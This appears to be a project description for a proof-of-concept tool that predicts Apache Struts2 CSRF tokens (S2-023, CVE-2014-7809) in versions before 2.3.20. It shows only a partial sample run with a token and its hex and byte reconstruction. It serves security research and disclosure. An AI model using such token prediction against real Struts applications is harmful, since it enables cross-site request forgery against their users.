Proof of concept code to predict Struts2 CSRF Token < 2.3.20
Proof of concept code to predict Struts CSRF token [S2-023] For a complete explanation, you can read : Predicting Struts CSRF Token (CVE-2014-7809) Execution preview: == Initial token H6P3Y3GHIC2865ASZVQ913NR93QZO7BR == Initial token in hex (easier evaluation) 14b08fcbf6523eecd7dd7d3e89cf97d6f478db5617 Guessing part == bytes representation (reconstructed byte array) 14b08fc